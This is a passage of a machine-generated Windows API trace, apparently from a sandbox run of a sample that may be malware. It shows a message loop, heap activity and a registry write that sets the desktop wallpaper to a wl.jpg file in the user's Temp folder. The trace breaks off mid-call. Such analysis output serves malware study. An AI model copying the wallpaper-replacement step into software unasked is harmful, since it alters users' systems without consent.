(dwMilliseconds=0xa) [0293.483] timeGetTime () returned 0x495e7 [0293.483] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.483] Sleep (dwMilliseconds=0xa) [0293.499] timeGetTime () returned 0x495f7 [0293.499] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.499] Sleep (dwMilliseconds=0xa) [0293.514] timeGetTime () returned 0x49606 [0293.515] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.515] Sleep (dwMilliseconds=0xa) [0293.530] timeGetTime () returned 0x49616 [0293.530] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.530] Sleep (dwMilliseconds=0xa) [0293.546] timeGetTime () returned 0x49625 [0293.546] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.546] Sleep (dwMilliseconds=0xa) [0293.561] timeGetTime () returned 0x49635 [0293.561] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.561] Sleep (dwMilliseconds=0xa) [0293.577] timeGetTime () returned 0x49645 [0293.577] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.577] Sleep (dwMilliseconds=0xa) [0293.593] timeGetTime () returned 0x49654 [0293.593] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.593] Sleep (dwMilliseconds=0xa) [0293.608] timeGetTime () returned 0x49664 [0293.608] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.608] Sleep (dwMilliseconds=0xa) [0293.624] timeGetTime () returned 0x49673 [0293.624] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.624] Sleep (dwMilliseconds=0xa) [0293.639] timeGetTime () returned 0x49683 [0293.639] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0293.639] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0293.639] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0293.639] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0293.640] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0293.640] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.640] Sleep (dwMilliseconds=0xa) [0293.655] timeGetTime () returned 0x49693 [0293.655] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.655] Sleep (dwMilliseconds=0xa) [0293.670] timeGetTime () returned 0x496a2 [0293.670] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.670] Sleep (dwMilliseconds=0xa) [0293.686] timeGetTime () returned 0x496b2 [0293.686] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.686] Sleep (dwMilliseconds=0xa) [0293.702] timeGetTime () returned 0x496c1 [0293.702] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.702] Sleep (dwMilliseconds=0xa) [0293.718] timeGetTime () returned 0x496d1 [0293.718] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.718] Sleep (dwMilliseconds=0xa) [0293.733] timeGetTime () returned 0x496e1 [0293.733] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.733] Sleep (dwMilliseconds=0xa) [0293.748] timeGetTime () returned 0x496f0 [0293.748] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.748] Sleep (dwMilliseconds=0xa) [0293.764] timeGetTime () returned 0x49700 [0293.764] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.764] Sleep (dwMilliseconds=0xa) [0293.780] timeGetTime () returned 0x4970f [0293.780] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.780] Sleep (dwMilliseconds=0xa) [0293.795] timeGetTime () returned 0x4971f [0293.795] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.795] Sleep (dwMilliseconds=0xa) [0293.812] timeGetTime () returned 0x4972f [0293.814] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.814] Sleep (dwMilliseconds=0xa) [0293.826] timeGetTime () returned 0x4973e [0293.826] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.827] Sleep (dwMilliseconds=0xa) [0293.842] timeGetTime () returned 0x4974e [0293.842] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.842] Sleep (dwMilliseconds=0xa) [0293.857] timeGetTime () returned 0x4975d [0293.858] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.858] Sleep (dwMilliseconds=0xa) [0293.873] timeGetTime () returned 0x4976d [0293.873] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.873] Sleep (dwMilliseconds=0xa) [0293.889] timeGetTime () returned 0x4977d [0293.889] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.889] Sleep (dwMilliseconds=0xa) [0293.904] timeGetTime () returned 0x4978c [0293.904] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.904] Sleep (dwMilliseconds=0xa) [0293.920] timeGetTime () returned 0x4979c [0293.920] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.920] Sleep (dwMilliseconds=0xa) [0293.936] timeGetTime () returned 0x497ab [0293.936] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.936] Sleep (dwMilliseconds=0xa) [0293.951] timeGetTime () returned 0x497bb [0293.951] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.951] Sleep (dwMilliseconds=0xa) [0293.975] timeGetTime () returned 0x497cb [0293.975] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.975] Sleep (dwMilliseconds=0xa) [0293.990] timeGetTime () returned 0x497da [0293.990] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.991] Sleep (dwMilliseconds=0xa) [0293.998] timeGetTime () returned 0x497ea [0293.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0293.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0293.998] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0293.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0293.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0293.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0293.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0293.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0293.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0293.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0293.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0293.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0293.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0293.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0293.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0293.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0293.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0293.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0294.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0294.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0294.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0294.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0294.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0294.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0294.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0294.000] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0294.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0294.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0294.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0294.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0294.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0294.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0294.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0294.001] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0294.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0294.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0294.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0294.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0294.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0294.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0294.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0294.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0294.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0294.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0294.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0294.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0294.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0294.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0294.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0294.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0294.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0294.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0294.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0294.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0294.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0294.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0294.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0294.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0294.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0294.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0294.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0294.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0294.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0294.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0294.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0294.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0294.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0294.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0294.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0294.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0294.004] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0294.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0294.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0294.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0294.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0294.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0294.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0294.004] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0294.004] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0294.004] RegCloseKey (hKey=0x294) returned 0x0 [0294.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0294.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0294.005] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0294.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0294.005] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0294.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0294.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0294.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0294.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0294.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0294.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0294.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0294.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0294.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0294.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0294.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0294.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0294.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0294.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0294.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0294.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0294.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0294.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0294.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0294.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0294.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0294.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0294.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0294.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0294.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0294.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0294.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0294.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0294.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0294.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0294.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0294.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0294.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0294.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0294.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0294.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0294.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0294.008] RtlAllocateHeap (HeapHandle=0x25c0000, 